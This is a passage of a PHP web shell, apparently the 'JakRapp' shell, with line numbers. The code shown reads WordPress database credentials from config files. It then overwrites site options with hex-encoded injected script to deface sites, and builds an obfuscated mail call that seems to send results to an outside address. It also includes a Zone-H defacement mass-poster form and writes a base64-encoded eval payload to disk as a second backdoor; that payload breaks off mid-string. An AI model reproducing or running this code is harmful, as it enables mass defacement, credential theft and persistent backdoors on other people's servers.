1764. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
1765. $db_password=$b3[1][0];
1766. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
1767. $host=$b4[1][0];
1768. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
1769. $p=$b5[1][0];
1770. $x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");
1771. $d=@mysql_connect( $host, $user, $db_password ) ;
1772. if ($d){
1773. @mysql_select_db($db );
1774. $source=stripslashes($_POST['index']);
1775. $s2=strToHex(($source));
1776. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
1777. $ls=strlen($s)-2;
1778. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
1779. mysql_query($sql) ;
1780. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
1781. mysql_query($sql) ;
1782. if (function_exists("mb_convert_encoding") )
1783. {
1784. $source2 = mb_convert_encoding('<title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-8');
1785. $source2=mysql_real_escape_string($source2);
1786. $sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
1787. @mysql_query($sql) ; ;
1788. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-8' WHERE `option_name` = 'blog_charset';";
1789. @mysql_query($sql) ; ;
1790. }
1791. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
1792. $siteurl=@mysql_fetch_array($aa) ;
1793. $siteurl=$siteurl['option_value'];
1794. $x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
1795. $tr.="$siteurl\n";
1796. mysql_close();
1797. }
1798. }
1799. if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
1800. }
1801. function strToHex($string)
1802. {
1803.     $hex='';
1804.     for ($i=0; $i < strlen($string); $i++)
1805.     {
1806.         if (strlen(dechex(ord($string[$i])))==1){
1807.         $hex .="%0". dechex(ord($string[$i]));
1808.                 }
1809.                 else
1810.                 {
1811.                 $hex .="%". dechex(ord($string[$i]));
1812.                 }
1813.     }
1814.     return $hex;
1815. }
1816.  
1817. function file_get_contents2($u){
1818.  
1819.         $ch = curl_init();
1820.     curl_setopt($ch,CURLOPT_URL,$u);
1821.         curl_setopt($ch, CURLOPT_HEADER, 0);    
1822.    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
1823.     curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
1824.             $result = curl_exec($ch);
1825.         return $result ;
1826.         }
1827.        
1828. ?>
1829. <?php
1830. if (isset($_GET['jak']) && ($_GET['jak'] == 'zonh')) { ?>
1831. <form action="?jak=zonh" method="post">
1832. <br><br>
1833. <center><span style="font-size:1.6em;"> .: Zone-H Mass Poster :. </span></center><center><BR><form action="" method="post"><input class="inputz" type="text" name="defacer" size="30" value="JakRapp"/><br> <select class="inputz"
1834. name="hackmode">
1835. <option>------------------------------------SELECT-------------------------------------</option>
1836. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
1837. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
1838. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
1839. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
1840. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
1841. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
1842. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
1843. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
1844. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
1845. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
1846. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
1847. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
1848. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
1849. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
1850. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
1851. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
1852. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
1853. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
1854. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
1855. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
1856. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
1857. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
1858. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
1859. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
1860. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
1861. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
1862. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
1863. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
1864.  
1865. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
1866. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
1867. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
1868. </select> <br>
1869.  
1870. <select class="inputz" name="reason">
1871. <option >------------------------------------SELECT-------------------------------------</option>
1872. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
1873. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
1874. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
1875. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
1876. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
1877. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
1878. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
1879. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
1880. </select> <br>
1881. <textarea class="inputz" name="domain" cols="90"  rows="20" placeholder="List Of Domains, 20 Rows."></textarea><br>
1882. <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
1883. </form>
1884. <?
1885.     echo "</form></center>";?>
1886. <?
1887. function ZoneH($url, $hacker, $hackmode,$reson, $site )
1888. {
1889.     $k = curl_init();
1890.     curl_setopt($k, CURLOPT_URL, $url);
1891.     curl_setopt($k,CURLOPT_POST,true);
1892.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
1893.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
1894.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
1895.     $kubra = curl_exec($k);
1896.     curl_close($k);
1897.     return $kubra;
1898. }
1899. {
1900.                 ob_start();
1901.                 $sub = @get_loaded_extensions();
1902.                 if(!in_array("curl", $sub))
1903.                 {
1904.                     die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
1905.                 }
1906.              
1907.                 $hacker = $_POST['defacer'];
1908.                 $method = $_POST['hackmode'];
1909.                 $neden = $_POST['reason'];
1910.                 $site = $_POST['domain'];
1911.                  
1912.                 if (empty($hacker))
1913.                 {
1914.                     die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
1915.                 }
1916.                 elseif($method == "--------SELECT--------")  
1917.                 {
1918.                     die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
1919.                 }
1920.                 elseif($neden == "--------SELECT--------")  
1921.                 {
1922.                     die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
1923.                 }
1924.                 elseif(empty($site))  
1925.                 {
1926.                     die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
1927.                 }
1928.                 $i = 0;
1929.                 $sites = explode("\n", $site);
1930.                 while($i < count($sites))  
1931.                 {
1932.                     if(substr($sites[$i], 0, 4) != "http")  
1933.                     {
1934.                         $sites[$i] = "http://".$sites[$i];
1935.                     }
1936.                     ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
1937.                     echo "Domain : ".$sites[$i]." Defaced Last Years !";
1938.                     ++$i;
1939.                 }
1940.                 echo "";
1941.             }
1942. }
1943. ?>
1944. <?php
1945. if (isset($_GET['jak']) && ($_GET['jak'] == 'sql')) {
1946. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
1947. echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='s/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
1948. if (!is_dir('s')) {
1949. $mk = @mkdir('s', 0777);
1950. @fwrite($f, $c);
1951. $f2 = @fopen('s/db.php', 'w');
1952. $sml_db = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXblueGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3blueaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFl